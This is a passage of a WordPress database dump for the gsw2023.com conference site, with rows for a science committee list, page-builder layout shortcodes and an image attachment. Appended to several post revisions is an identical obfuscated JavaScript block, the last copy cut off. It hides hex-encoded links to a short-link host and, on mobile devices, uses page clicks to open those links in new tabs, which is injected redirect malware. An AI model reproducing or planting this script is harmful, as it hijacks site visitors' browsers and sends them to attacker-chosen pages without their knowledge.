Ukraine</strong></li>\n<li><strong>Michael Cramer, University of Stuttgart, Germany</strong></li>\n<li><strong>Dorota Iwaszczuk, Technical University of Darmstadt, Germany</strong></li>\n<li><strong>Zdzisław Kurczyński, Warsaw University of Technology, Poland</strong></li>\n<li><strong>Jon Mills, Newcastle University, United Kingdom</strong></li>\n<li><strong>Fabio Remondino, Bruno Kessler Foundation FBK, Italy</strong></li>\n<li><strong>Jan Skaloud, Swiss Federal Institute of Technology EPFL, Switzerland</strong></li>\n<li><strong>Guo Zhang, Wuhan University, China</strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2022-11-09 22:51:01','2022-11-09 22:51:01','',3266,'https://gsw2023.com/?p=3272',0,'revision','',0),
(3273,1,'2022-11-09 22:51:52','2022-11-09 22:51:52','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-09 22:51:52','2022-11-09 22:51:52','',2876,'https://gsw2023.com/?p=3273',0,'revision','',0),
(3274,1,'2022-11-11 15:03:59','2022-11-11 15:03:59','','Egypt2','','inherit','open','closed','','egypt2','','','2022-11-11 15:03:59','2022-11-11 15:03:59','',2372,'https://gsw2023.com/wp-content/uploads/2022/11/Egypt2.jpg',0,'attachment','image/jpeg',0),
(3275,1,'2022-11-11 15:04:25','2022-11-11 15:04:25','[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 